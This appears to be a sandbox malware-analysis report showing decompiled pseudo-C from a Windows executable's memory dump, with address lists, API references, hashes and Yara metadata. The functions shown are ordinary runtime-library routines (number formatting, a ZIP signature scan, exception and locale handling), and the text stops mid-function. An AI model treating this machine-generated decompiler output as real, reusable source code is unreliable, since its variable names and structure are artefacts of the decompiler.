					_v8 = 2;
					__eflags = _t234 - 0x2b;
					if(__eflags == 0) {
						L14:
						_v104 = 1;
					} else {
						_v104 = 0;
						__eflags = _t234 - 0x2d;
						if(__eflags == 0) {
							goto L14;
						}
					}
					_v96 =  *((intOrPtr*)( *((intOrPtr*)(E0042E101(_t428, _t433, __eflags)))));
					_v95 = 0x65;
					_t434 = E0042CDD0(_t428, 0x65, _t312);
					_t238 = E0042CDD0(_t428, _v96, _t312);
					_t451 = _t450 + 0x18;
					_v84 = _t238;
					__eflags = _t238;
					if(_t238 == 0) {
						_v88 = _t238;
					}
					_t330 = _v56;
					_t389 = _v76;
					_t239 = _t389;
					__eflags = _t330 - 0x10;
					if(_t330 < 0x10) {
						_t239 =  &_v76;
					}
					__eflags =  *_t239 - 0x7f;
					if( *_t239 != 0x7f) {
						_t289 = _t389;
						__eflags = _t330 - 0x10;
						if(_t330 < 0x10) {
							_t289 =  &_v76;
						}
						__eflags =  *_t289;
						if( *_t289 > 0) {
							E0040A4B0( &_v48, _t428, _t312);
							__eflags = _t434;
							if(_t434 != 0) {
								_t317 = _v84;
								__eflags = _t317;
								if(_t317 == 0) {
									_t389 = _v92;
									E0040A5D0( &_v48, _v92, 0x30);
									_v92 = _t317;
								}
								__eflags = _t434 - _t428;
								E00421AB0( &_v48, _t389, _t434 - _t428, _v88, 0x30);
							} else {
								E0040A5D0( &_v48, _v88, 0x30);
								_t317 = _v84;
							}
							_push(0x30);
							__eflags = _t317;
							if(_t317 != 0) {
								_t318 = _t317 - _t428;
								__eflags = _t318;
								_push(_v112);
								_push(_t318 + 1);
								E00421AB0( &_v48, _v112);
								_t373 =  &_v48;
								E00421AB0( &_v48, _v112, _t318, _v92, 0x30);
								_v112 = 0;
							} else {
								_push(_v92);
								_t373 =  &_v48;
								E0040A5D0( &_v48);
							}
							_t319 = _v76;
							_v92 = 0;
							__eflags = _v56 - 0x10;
							if(_v56 < 0x10) {
								_t319 =  &_v76;
							}
							_t296 = _v48;
							__eflags = _v28 - 0x10;
							if(_v28 < 0x10) {
								_t296 =  &_v48;
							}
							_t424 =  &_v96;
							_t431 = E0042E130(_t373, _t296,  &_v96);
							_t298 =  *_t319;
							_t451 = _t451 + 8;
							__eflags = _t298 - 0x7f;
							if(_t298 != 0x7f) {
								while(1) {
									__eflags = _t298;
									if(_t298 <= 0) {
										goto L41;
									}
									_t299 = _t298;
									__eflags = _t299 - _t431 - _v104;
									if(_t299 < _t431 - _v104) {
										_t431 = _t431 - _t299;
										E00421AB0( &_v48, _t424, _t431, 1, 0);
										__eflags =  *(_t319 + 1);
										if( *(_t319 + 1) > 0) {
											_t319 = _t319 + 1;
											__eflags = _t319;
										}
										_t298 =  *_t319;
										__eflags = _t298 - 0x7f;
										if(_t298 != 0x7f) {
											continue;
										}
									}
									goto L41;
								}
							}
							L41:
							_t428 = _v48;
							__eflags = _v28 - 0x10;
							if(_v28 < 0x10) {
								_t428 =  &_v48;
							}
							_t425 = _v32;
							_v88 = 0;
							_v80 = _t425;
							_t312 = _t425;
						}
					}
					_t390 = _v124;
					_t331 =  *(_t390 + 0x20);
					_t243 = _v88 + _t312 + _v112 + _v92;
					__eflags =  *(_t390 + 0x24);
					if(__eflags < 0) {
						L49:
						_v84 = 0;
					} else {
						if(__eflags > 0) {
							L47:
							__eflags = _t331 - _t243;
							if(_t331 <= _t243) {
								goto L49;
							} else {
								_v84 = _t331 - _t243;
							}
						} else {
							__eflags = _t331;
							if(_t331 == 0) {
								goto L49;
							} else {
								goto L47;
							}
						}
					}
					_t435 = _a4;
					_t245 =  *(_t390 + 0x14) & 0x000001c0;
					__eflags = _t245 - 0x40;
					if(_t245 != 0x40) {
						__eflags = _t245 - 0x100;
						if(_t245 == 0x100) {
							__eflags = _v104;
							if(_v104 > 0) {
								_t286 = E00421460(_t435,  &_v108, _a12, _a16, _t428, 1);
								_t451 = _t451 + 0x18;
								_a12 =  *_t286;
								_t428 = _t428 + 1;
								_t312 = _t312 - 1;
								__eflags = _t312;
								_a16 =  *((intOrPtr*)(_t286 + 4));
								_v80 = _t312;
							}
							_t283 = E004214D0(_t435,  &_v108, _a12, _a16, _a24, _v84);
							_a12 =  *_t283;
							_a16 =  *((intOrPtr*)(_t283 + 4));
						} else {
							_t288 = E004214D0(_t435,  &_v108, _a12, _a16, _a24, _v84);
							_a12 =  *_t288;
							_a16 =  *((intOrPtr*)(_t288 + 4));
						}
						_v84 = 0;
						_t451 = _t451 + 0x18;
					}
					_t246 = E0042CDD0(_t428, _v96, _t312);
					_t452 = _t451 + 0xc;
					__eflags = _t246;
					if(_t246 != 0) {
						_t131 = _t246 - _t428 + 1; // 0x1
						_t316 = _t131;
						_t132 = _t316 - 1; // 0x0
						_t271 = E00421540(_t435,  &_v108, _a12, _a16, _t428, _t132, _v100);
						_a12 =  *_t271;
						_a16 =  *((intOrPtr*)(_t271 + 4));
						_t273 = E004214D0(_t435,  &_v108,  *_t271,  *((intOrPtr*)(_t271 + 4)), 0x30, _v92);
						_a12 =  *_t273;
						_a16 =  *((intOrPtr*)(_t273 + 4));
						_v116 =  *((intOrPtr*)( *((intOrPtr*)( *_v128 + 4))))();
						_t278 = E004214D0(_t435,  &_v132, _a12, _a16, _v116, 1);
						_a12 =  *_t278;
						_a16 =  *((intOrPtr*)(_t278 + 4));
						_t280 = E004214D0(_t435,  &_v120,  *_t278,  *((intOrPtr*)(_t278 + 4)), 0x30, _v112);
						_t428 = _t428 + _t316;
						_t452 = _t452 + 0x64;
						_t156 =  &_v80;
						 *_t156 = _v80 - _t316;
						__eflags =  *_t156;
						_t312 = _v80;
						_a12 =  *_t280;
						_a16 =  *((intOrPtr*)(_t280 + 4));
					}
					_t247 = E0042CDD0(_t428, 0x65, _t312);
					_t453 = _t452 + 0xc;
					__eflags = _t247;
					if(_t247 != 0) {
						_t163 = _t247 - _t428 + 1; // 0x1
						_t315 = _t163;
						_t166 = _t315 - 1; // 0x0
						_t262 = E00421540(_t435,  &_v120, _a12, _a16, _t428, _t166, _v100);
						_a12 =  *_t262;
						_a16 =  *((intOrPtr*)(_t262 + 4));
						_t264 = E004214D0(_t435,  &_v120,  *_t262,  *((intOrPtr*)(_t262 + 4)), 0x30, _v88);
						_a12 =  *_t264;
						_t348 = _v124;
						_t457 = _t453 + 0x34;
						__eflags =  *(_t348 + 0x14) & 0x00000004;
						_a16 =  *((intOrPtr*)(_t264 + 4));
						_v88 = 0;
						_t349 = "E";
						if(( *(_t348 + 0x14) & 0x00000004) == 0) {
							_t349 = "e";
						}
						_t266 = E00421460(_t435,  &_v120,  *_t264,  *((intOrPtr*)(_t264 + 4)), _t349, 1);
						_t428 = _t428 + _t315;
						_t453 = _t457 + 0x18;
						_t184 =  &_v80;
						 *_t184 = _v80 - _t315;
						__eflags =  *_t184;
						_t312 = _v80;
						_a12 =  *_t266;
						_a16 =  *((intOrPtr*)(_t266 + 4));
					}
					_t249 = E00421540(_t435,  &_v120, _a12, _a16, _t428, _t312, _v100);
					_a12 =  *_t249;
					_a16 =  *((intOrPtr*)(_t249 + 4));
					_t251 = E004214D0(_t435,  &_v132,  *_t249,  *((intOrPtr*)(_t249 + 4)), 0x30, _v88);
					_t395 = _v124;
					_t429 = _v136;
					_a12 =  *_t251;
					 *((intOrPtr*)(_t395 + 0x20)) = 0;
					 *((intOrPtr*)(_t395 + 0x24)) = 0;
					_t397 = _a24;
					_a16 =  *((intOrPtr*)(_t251 + 4));
					E004214D0(_t435, _v136,  *_t251,  *((intOrPtr*)(_t251 + 4)), _a24, _v84);
					_t454 = _t453 + 0x4c;
					__eflags = _v28 - 0x10;
					if(_v28 >= 0x10) {
						_push(_v48);
						E0042A289();
						_t454 = _t454 + 4;
					}
					_v28 = 0xf;
					_v32 = 0;
					_v48 = 0;
					__eflags = _v56 - 0x10;
					if(_v56 >= 0x10) {
						_push(_v76);
						E0042A289();
					}
					 *[fs:0x0] = _v16;
					_pop(_t430);
					_pop(_t437);
					_pop(_t314);
					__eflags = _v20 ^ _t446;
					return E0042A36A(_t429, _t314, _v20 ^ _t446, _t397, _t430, _t437);
				} else {
					_v4 = 1;
					return E00422200;
				}
			}

0x004221d7
0x004221dc
0x004221e3
0x004221e5
0x004221e5
0x004221e8
0x004221eb
0x004221f1
0x0042220c
0x00422211
0x00422212
0x00422213
0x00422214
0x00422215
0x00422216
0x00422217
0x00422218
0x00422219
0x0042221a
0x0042221b
0x0042221c
0x0042221d
0x0042221e
0x0042221f
0x00422221
0x00422223
0x00422225
0x00422230
0x00422234
0x00422239
0x0042223b
0x00422241
0x00422245
0x00422254
0x00422257
0x0042225a
0x00422263
0x00422266
0x00422270
0x00422273
0x00422276
0x00422279
0x0042227f
0x0042228b
0x0042228d
0x00422290
0x00422293
0x00422296
0x0042229d
0x0042229f
0x004222a1
0x004222a8
0x004222ab
0x004222b0
0x004222b3
0x004222b5
0x004222b7
0x004222ba
0x004222bc
0x004222bc
0x004222bd
0x004222bd
0x004222ba
0x004222c5
0x004222cc
0x004222d1
0x004222d1
0x004222d4
0x004222de
0x004222de
0x004222e0
0x004222e0
0x004222e9
0x004222f5
0x00422300
0x00422303
0x0042230a
0x0042230d
0x00422310
0x00422312
0x00422316
0x00422318
0x00422321
0x00422321
0x0042231a
0x0042231a
0x0042231d
0x0042231f
0x00000000
0x00000000
0x0042231f
0x00422335
0x00422338
0x00422343
0x0042234c
0x00422351
0x00422354
0x00422357
0x00422359
0x0042235b
0x0042235b
0x0042235e
0x00422361
0x00422364
0x00422366
0x00422369
0x0042236b
0x0042236b
0x0042236e
0x00422371
0x00422377
0x00422379
0x0042237c
0x0042237e
0x0042237e
0x00422381
0x00422384
0x0042238f
0x00422394
0x00422396
0x004223ab
0x004223ae
0x004223b0
0x004223b2
0x004223bb
0x004223c0
0x004223c0
0x004223c9
0x004223cf
0x00422398
0x004223a1
0x004223a6
0x004223a6
0x004223d4
0x004223d6
0x004223d8
0x004223eb
0x004223eb
0x004223ed
0x004223f1
0x004223f5
0x00422401
0x00422404
0x00422409
0x004223da
0x004223dd
0x004223de
0x004223e1
0x004223e1
0x00422410
0x00422418
0x0042241f
0x00422422
0x00422424
0x00422424
0x00422427
0x0042242a
0x0042242d
0x0042242f
0x0042242f
0x00422432
0x0042243c
0x0042243e
0x00422440
0x00422443
0x00422445
0x00422447
0x00422447
0x00422449
0x00000000
0x00000000
0x00422450
0x00422453
0x00422455
0x00422459
0x00422461
0x00422466
0x0042246a
0x0042246c
0x0042246c
0x0042246c
0x0042246d
0x0042246f
0x00422471
0x00000000
0x00000000
0x00422471
0x00000000
0x00422455
0x00422447
0x00422473
0x00422473
0x00422476
0x00422479
0x0042247b
0x0042247b
0x0042247e
0x00422481
0x00422488
0x0042248b
0x0042248b
0x00422384
0x00422490
0x00422493
0x0042249b
0x0042249e
0x004224a2
0x004224b5
0x004224b5
0x004224a4
0x004224a4
0x004224aa
0x004224aa
0x004224ac
0x00000000
0x004224ae
0x004224b0
0x004224b0
0x004224a6
0x004224a6
0x004224a8
0x00000000
0x00000000
0x00000000
0x00000000
0x004224a8
0x004224a4
0x004224bf
0x004224c2
0x004224c7
0x004224ca
0x004224d0
0x004224d5
0x004224fe
0x00422502
0x00422514
0x0042251b
0x0042251e
0x00422524
0x00422525
0x00422525
0x00422526
0x00422529
0x00422529
0x00422541
0x00422548
0x0042254e
0x004224d7
0x004224ec
0x004224f3
0x004224f9
0x004224f9
0x00422551
0x00422558
0x00422558
0x00422562
0x00422567
0x0042256a
0x0042256c
0x0042257e
0x0042257e
0x00422581
0x0042258d
0x00422594
0x0042259e
0x004225af
0x004225b9
0x004225bf
0x004225d1
0x004225e2
0x004225e9
0x004225f3
0x00422604
0x0042260b
0x0042260d
0x00422610
0x00422610
0x00422610
0x00422613
0x00422616
0x0042261c
0x0042261c
0x00422623
0x00422628
0x0042262b
0x0042262d
0x00422638
0x00422638
0x00422642
0x0042264e
0x00422655
0x0042265f
0x00422670
0x00422677
0x0042267a
0x00422680
0x00422683
0x00422687
0x0042268a
0x00422691
0x00422696
0x00422698
0x00422698
0x004226ac
0x004226b3
0x004226b5
0x004226b8
0x004226b8
0x004226b8
0x004226bb
0x004226be
0x004226c4
0x004226c4
0x004226da
0x004226e1
0x004226eb
0x004226fc
0x00422703
0x00422706
0x0042270c
0x00422714
0x00422717
0x0042271e
0x00422726
0x00422729
0x00422733
0x00422736
0x00422739
0x0042273e
0x0042273f
0x00422744
0x00422744
0x00422747
0x0042274e
0x00422751
0x00422754
0x00422757
0x0042275c
0x0042275d
0x00422762
0x0042276a
0x00422772
0x00422773
0x00422774
0x00422778
0x00422782
0x004221f3
0x004221f3
0x004221ff
0x004221ff

Strings

e, xrefs: 00422338

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID: e
API String ID: 0-4024072794
Opcode ID: 2dfb6e341e248dc2339d422e7195decea121a0ca7df87ed4f06fe6464fc2d7fb
Instruction ID: 4e64052fd6569b1af0704174c1934e1b834acb84eb2e9ddd9d7730854174660e
Opcode Fuzzy Hash: 2dfb6e341e248dc2339d422e7195decea121a0ca7df87ed4f06fe6464fc2d7fb
Instruction Fuzzy Hash: 530280B1A00218AFDB04DF94D985EEEBBB5FF88304F54815EE805AB351D778AD01CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406480 Relevance: 9.2, APIs: 6, Instructions: 171
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406480(struct _OVERLAPPED* _a4) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				struct _OVERLAPPED* _v28;
				void* __edi;
				void* __esi;
				signed int _t61;
				signed int _t62;
				struct _OVERLAPPED* _t63;
				struct _OVERLAPPED* _t67;
				struct _OVERLAPPED* _t69;
				struct _OVERLAPPED* _t70;
				signed int _t72;
				void* _t74;
				struct _OVERLAPPED* _t87;
				long _t89;
				struct _OVERLAPPED* _t92;
				void* _t98;
				struct _OVERLAPPED* _t100;
				struct _OVERLAPPED* _t109;
				signed int _t111;
				char* _t113;
				void* _t114;
				void* _t115;

				_t113 = _a4;
				if( *_t113 == 0) {
					 *(_t113 + 0x1c) =  *(_t113 + 0x18);
					goto L3;
				} else {
					if( *((char*)(_t113 + 1)) == 0) {
						return _t61 | 0xffffffff;
					} else {
						SetFilePointer( *(_t113 + 4), 0, 0, 2);
						L3:
						if( *_t113 == 0) {
							_t100 =  *(_t113 + 0x1c);
							_a4 = _t100;
							_t87 = _t100;
						} else {
							if( *((char*)(_t113 + 1)) == 0) {
								_a4 = 0;
								_t87 = _a4;
							} else {
								_t87 = SetFilePointer( *(_t113 + 4), 0, 0, 1) -  *((intOrPtr*)(_t113 + 0xc));
								_a4 = _t87;
							}
						}
						_t109 = 0xffff;
						_v8 = 0xffff;
						if(_t87 < 0xffff) {
							_v8 = _t87;
							_t109 = _t87;
						}
						_t62 = E0042BDF8(_t100, _t109, _t113, 0x404);
						_t115 = _t114 + 4;
						_v16 = _t62;
						if(_t62 != 0) {
							_t63 = 4;
							_v20 = 0xffffffff;
							if(_t109 > 4) {
								while(1) {
									_t67 = _t63 + 0x400;
									_v12 = _t109;
									if(_t67 <= _t109) {
										_v12 = _t67;
									}
									_t69 = _t87 - _v12;
									_t89 = _t87 - _t69;
									_v28 = _t69;
									if(_t89 > 0x404) {
										_t89 = 0x404;
									}
									if( *_t113 == 0) {
										goto L24;
									}
									if( *((char*)(_t113 + 1)) != 0) {
										SetFilePointer( *(_t113 + 4),  *((intOrPtr*)(_t113 + 0xc)) + _t69, 0, 0);
										L25:
										_t111 = _t89;
										if( *_t113 == 0) {
											_t70 =  *(_t113 + 0x1c);
											_t92 =  *(_t113 + 0x18);
											if(_t70 + _t89 > _t92) {
												_t111 = _t92 - _t70;
											}
											E0042B8D0(_v16,  *((intOrPtr*)(_t113 + 0x14)) + _t70, _t111);
											_t115 = _t115 + 0xc;
											 *(_t113 + 0x1c) =  *(_t113 + 0x1c) + _t111;
											_t72 = _t111;
										} else {
											if(ReadFile( *(_t113 + 4), _v16, _t89,  &_v24, 0) == 0) {
												 *((char*)(_t113 + 8)) = 1;
											}
											_t72 = _v24;
										}
										if(_t72 / _t89 == 1) {
											_t74 = _t89 - 3;
											if(_t74 >= 0) {
												while(1) {
													_t98 = _v16;
													_t74 = _t74 - 1;
													if( *((char*)(_t74 + _t98)) == 0x50 &&  *((char*)(_t74 + _t98 + 1)) == 0x4b &&  *((char*)(_t74 + _t98 + 2)) == 5 &&  *((char*)(_t74 + _t98 + 3)) == 6) {
														break;
													}
													if(_t74 >= 0) {
														continue;
													} else {
													}
													goto L42;
												}
												_v20 = _t74 + _v28;
											}
											L42:
											if(_v20 == 0 && _v12 < _v8) {
												_t109 = _v8;
												_t63 = _v12;
												_t87 = _a4;
												continue;
											}
										}
									}
									goto L44;
									L24:
									 *(_t113 + 0x1c) = _t69;
									goto L25;
								}
							}
							L44:
							E0042BE8C(_v16);
							return _v20;
						} else {
							return _t62 | 0xffffffff;
						}
					}
				}
			}

0x00406487
0x0040648d
0x004064ce
0x00000000
0x0040648f
0x00406493
0x004064da
0x00406495
0x0040649f
0x004064a5
0x004064a9
0x004064e7
0x004064ea
0x004064ed
0x004064ab
0x004064af
0x004064db
0x004064e2
0x004064b1
0x004064c4
0x004064c6
0x004064c6
0x004064af
0x004064f0
0x004064f5
0x004064fa
0x004064fc
0x004064ff
0x004064ff
0x00406506
0x0040650b
0x0040650e
0x00406513
0x0040651f
0x00406524
0x0040652d
0x0040653e
0x0040653e
0x00406543
0x00406548
0x0040654a
0x0040654a
0x0040654f
0x00406552
0x00406554
0x0040655d
0x0040655f
0x0040655f
0x00406567
0x00000000
0x00000000
0x0040656d
0x00406581
0x0040658c
0x0040658f
0x00406591
0x004065b5
0x004065b8
0x004065c0
0x004065c4
0x004065c4
0x004065d1
0x004065d6
0x004065d9
0x004065dc
0x00406593
0x004065aa
0x004065ac
0x004065ac
0x004065b0
0x004065b0
0x004065e5
0x004065e7
0x004065ec
0x004065f0
0x004065f0
0x004065f3
0x004065f8
0x00000000
0x00000000
0x00406611
0x00000000
0x00000000
0x00406613
0x00000000
0x00406611
0x00406618
0x00406618
0x0040661b
0x0040661f
0x00406535
0x00406538
0x0040653b
0x00000000
0x0040653b
0x0040661f
0x004065e5
0x00000000
0x00406589
0x00406589
0x00000000
0x00406589
0x0040653e
0x0040662d
0x00406631
0x00406642
0x00406515
0x0040651e
0x0040651e
0x00406513
0x00406493

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040649F
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004064BB
_malloc.LIBCMT ref: 00406506
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00406581
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004065A2
_free.LIBCMT ref: 00406631

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: File$Pointer$Read_free_malloc
String ID:
API String ID: 1382768672-0
Opcode ID: 60820dd605fcadbb4e3a6b26e0016cf4ae2f8436d535e503cee4922b0041b5d7
Instruction ID: fafa6da24b90d5c227322c1c797147f375854da45cf7eb4bc9c9d6c7aded8b61
Opcode Fuzzy Hash: 60820dd605fcadbb4e3a6b26e0016cf4ae2f8436d535e503cee4922b0041b5d7
Instruction Fuzzy Hash: 8951E2B0E00205AFEB20CF68D884B6ABBF5AB40310F15857EE946A73C1D779E951CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0043002C Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0043002C(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x44d358);
				E00433750(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E0042C8EC(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E004324B4(__ecx, __edx, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E004324B4(_t48, __edx, _t61) + 0x8c));
				 *((intOrPtr*)(E004324B4(_t48, _t53, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E004324B4(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E0042C991(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E00430152(_t48, _t53, _t55, _t57, _t61);
				return E00433795( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x0043002c
0x0043002c
0x0043002c
0x0043002e
0x00430033
0x00430038
0x0043003a
0x0043003d
0x00430040
0x00430043
0x0043004a
0x0043005b
0x00430069
0x00430077
0x0043007f
0x0043008d
0x00430093
0x0043009a
0x0043009d
0x004300b3
0x004300b6
0x0043012b
0x00430132
0x00430139
0x00430146

APIs

__CreateFrameInfo.LIBCMT ref: 00430054

Part of subcall function 0042C8EC: __getptd.LIBCMT ref: 0042C8FA
Part of subcall function 0042C8EC: __getptd.LIBCMT ref: 0042C908

__getptd.LIBCMT ref: 0043005E

Part of subcall function 004324B4: __getptd_noexit.LIBCMT ref: 004324B7
Part of subcall function 004324B4: __amsg_exit.LIBCMT ref: 004324C4

__getptd.LIBCMT ref: 0043006C
__getptd.LIBCMT ref: 0043007A
__getptd.LIBCMT ref: 00430085
_CallCatchBlock2.LIBCMT ref: 004300AB

Part of subcall function 0042C991: __CallSettingFrame@12.LIBCMT ref: 0042C9DD

Part of subcall function 00430152: __getptd.LIBCMT ref: 00430161
Part of subcall function 00430152: __getptd.LIBCMT ref: 0043016F

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 56a20dfb88fed6de140640f5c0f25954634b20794e53f77bed4905c292bb0fa7
Instruction ID: 3542a1830495a2571172ea1ecb0d8c0c24a2a3a99e40e4d551574f6afa31e8b2
Opcode Fuzzy Hash: 56a20dfb88fed6de140640f5c0f25954634b20794e53f77bed4905c292bb0fa7
Instruction Fuzzy Hash: D911E7B1D00209DFDF00EFA5D985A9D77B0BB08315F10916AF854AB252DB7C9A119F54

Uniqueness

Uniqueness Score: -1.00%

Function 00432A7F Relevance: 9.0, APIs: 6, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00432A7F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x44d4c8);
				E00433750(__ebx, __edi, __esi);
				_t31 = E004324B4(__ebx, __edx, _t35);
				_t15 =  *0x4528e0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00433F2B(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x4527e8; // 0x25c1608
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x4523c0;
								if(__eflags != 0) {
									E0042BE8C(_t33);
								}
							}
						}
						_t21 =  *0x4527e8; // 0x25c1608
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x4527e8; // 0x25c1608
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00432B1A();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E0043110E(_t29, _t38);
				}
				return E00433795(_t33);
			}

0x00432a7f
0x00432a7f
0x00432a7f
0x00432a7f
0x00432a81
0x00432a86
0x00432a90
0x00432a92
0x00432a9a
0x00432abb
0x00432ac1
0x00432ac5
0x00432ac8
0x00432acb
0x00432ad1
0x00432ad3
0x00432ad5
0x00432ade
0x00432ae0
0x00432ae2
0x00432ae8
0x00432aeb
0x00432af0
0x00432ae8
0x00432ae0
0x00432af1
0x00432af6
0x00432af9
0x00432aff
0x00432b03
0x00432b03
0x00432b09
0x00432b10
0x00432aa2
0x00432aa2
0x00432aa2
0x00432aa5
0x00432aa7
0x00432aa9
0x00432aab
0x00432ab0
0x00432ab8

APIs

__getptd.LIBCMT ref: 00432A8B

Part of subcall function 004324B4: __getptd_noexit.LIBCMT ref: 004324B7
Part of subcall function 004324B4: __amsg_exit.LIBCMT ref: 004324C4

__amsg_exit.LIBCMT ref: 00432AAB
__lock.LIBCMT ref: 00432ABB
InterlockedDecrement.KERNEL32(?), ref: 00432AD8
_free.LIBCMT ref: 00432AEB
InterlockedIncrement.KERNEL32(025C1608), ref: 00432B03

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: d09c747d565f43cf8ae5b41ecb4fcb9f7213171aeda97d557076577d55cc67bc
Instruction ID: 921119d2baf15f7ea5ba5fd9722946f67883e75fc913ad59e79640eb127d755a
Opcode Fuzzy Hash: d09c747d565f43cf8ae5b41ecb4fcb9f7213171aeda97d557076577d55cc67bc
Instruction Fuzzy Hash: 8D01A131901721A7DB20FF659A0575AB3A0AF0DB25F00211BE80467391C7BCA941DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0042CB65 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0042CB65(void* __edi, signed char _a4, signed char _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed char _t43;
				void* _t44;
				void* _t46;
				signed char _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				intOrPtr _t58;
				void* _t59;
				signed char _t64;
				signed char _t68;
				signed int _t69;
				intOrPtr _t75;
				signed char _t76;
				signed char _t78;
				signed char _t81;
				signed char _t83;

				E0042C9F1( &_v20, __edi, _a12);
				if( *((intOrPtr*)(_v16 + 8)) != 0) {
					_t43 = _a8;
					__eflags = _t43;
					if(__eflags != 0) {
						__eflags =  *_t43;
						if( *_t43 != 0) {
							_t81 = _a4;
							__eflags = _t81;
							if(__eflags != 0) {
								_push(__edi);
								_t78 = _t81;
								_t44 = E0042BC70(_t43);
								_t46 = E0042BC70(_t81) + _t81 - _t44;
								__eflags =  *_t81;
								if( *_t81 == 0) {
									L27:
									__eflags = _v8;
									if(_v8 != 0) {
										_t48 = _v12;
										_t35 = _t48 + 0x70;
										 *_t35 =  *(_t48 + 0x70) & 0xfffffffd;
										__eflags =  *_t35;
									}
									_t47 = 0;
									__eflags = 0;
									L30:
									L31:
									return _t47;
								}
								_t83 = _t81 - _a8;
								__eflags = _t83;
								while(1) {
									__eflags = _t78 - _t46;
									if(_t78 > _t46) {
										goto L27;
									}
									_t64 =  *_t78;
									_t68 = _a8;
									__eflags = _t64;
									if(_t64 == 0) {
										L22:
										__eflags =  *_t68;
										if( *_t68 == 0) {
											L33:
											__eflags = _v8;
											if(_v8 != 0) {
												_t49 = _v12;
